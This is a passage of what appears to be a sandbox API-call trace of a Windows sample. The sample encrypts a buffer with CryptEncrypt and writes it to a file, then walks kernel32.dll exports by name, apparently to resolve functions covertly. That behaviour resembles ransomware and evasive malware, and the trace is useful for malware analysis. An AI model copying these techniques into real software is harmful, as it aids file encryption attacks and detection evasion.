[0182.023] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0182.023] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0182.024] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0182.024] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.024] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.024] CloseHandle (hObject=0x288) returned 1 [0182.024] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.025] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0182.025] CloseHandle (hObject=0x0) returned 0 [0182.025] CloseHandle (hObject=0x284) returned 1 [0182.025] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.026] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.026] GetTickCount () returned 0x1134e4f [0182.026] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.026] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0182.026] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0182.026] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0182.027] lstrlenA (lpString="kernel32.dll") returned 12 [0182.027] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0182.027] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0182.027] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0182.027] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0182.027] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0182.027] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0182.027] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0182.027] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0182.027] lstrlenA (lpString="ADDATOMA") returned 8 [0182.027] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0182.027] lstrlenA (lpString="ADDATOMW") returned 8 [0182.027] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0182.027] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0182.027] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0182.027] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0182.027] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0182.027] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0182.027] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0182.027] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0182.027] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0182.027] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0182.027] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0182.027] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0182.027] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0182.027] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0182.028] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0182.028] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0182.028] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0182.028] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0182.028] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0182.028] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0182.028] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0182.028] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0182.028] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0182.028] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0182.028] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0182.028] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0182.028] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0182.028] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0182.028] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0182.028] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0182.028] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0182.028] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0182.028] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0182.028] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0182.028] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0182.028] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0182.028] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0182.028] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0182.028] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0182.028] lstrlenA (lpString="BACKUPREAD") returned 10 [0182.028] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0182.028] lstrlenA (lpString="BACKUPSEEK") returned 10 [0182.028] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0182.028] lstrlenA (lpString="BACKUPWRITE") returned 11 [0182.028] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0182.028] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0182.028] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0182.028] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0182.029] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0182.029] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0182.029] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0182.029] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0182.029] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0182.029] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0182.029] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0182.029] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0182.029] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0182.029] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0182.029] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0182.029] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0182.029] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0182.029] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0182.029] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0182.029] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0182.029] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0182.029] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0182.029] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0182.029] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0182.029] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0182.029] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0182.029] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0182.030] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0182.030] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0182.030] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0182.030] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0182.030] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0182.030] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0182.030] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0182.030] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0182.030] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0182.030] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0182.030] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0182.030] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0182.030] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0182.030] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0182.030] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0182.030] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0182.030] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0182.030] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0182.030] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0182.030] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0182.030] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0182.030] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0182.030] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0182.030] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0182.030] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0182.030] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0182.030] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0182.030] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0182.031] lstrlenA (lpString="BEEP") returned 4 [0182.031] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0182.031] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0182.031] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0182.031] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0182.031] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0182.031] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0182.031] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0182.031] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0182.031] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0182.031] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0182.031] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0182.031] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0182.031] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0182.031] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0182.031] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0182.031] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0182.031] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0182.031] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0182.031] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0182.031] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0182.031] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0182.031] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0182.031] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0182.031] lstrlenA (lpString="CANCELIO") returned 8 [0182.031] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0182.031] lstrlenA (lpString="CANCELIOEX") returned 10 [0182.031] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0182.031] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0182.031] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0182.031] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0182.031] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0182.031] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0182.031] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0182.031] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0182.032] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0182.032] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0182.032] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0182.032] lstrlenA (lpString="CHECKELEVATION") returned 14 [0182.032] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0182.032] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0182.032] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0182.032] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0182.032] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0182.032] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0182.032] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0182.032] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0182.032] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0182.032] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0182.032] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0182.032] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0182.032] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0182.032] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0182.032] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0182.032] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0182.032] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0182.032] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0182.032] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0182.032] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0182.032] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0182.032] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0182.032] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0182.032] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0182.032] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0182.032] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0182.032] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0182.032] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0182.032] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0182.032] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0182.032] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0182.033] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0182.033] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0182.033] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0182.033] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0182.033] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0182.033] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0182.033] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0182.033] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0182.033] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0182.033] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0182.033] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0182.033] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0182.033] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0182.033] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0182.033] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0182.033] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0182.033] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0182.033] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0182.033] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0182.033] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0182.033] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0182.033] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0182.033] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0182.033] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0182.033] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0182.033] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0182.033] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0182.033] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0182.033] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0182.033] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0182.033] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0182.033] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0182.033] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0182.033] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0182.033] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0182.033] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0182.034] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0182.034] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0182.034] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0182.034] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0182.034] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0182.034] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0182.034] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0182.034] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0182.034] lstrlenA (lpString="COPYCONTEXT") returned 11 [0182.034] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: 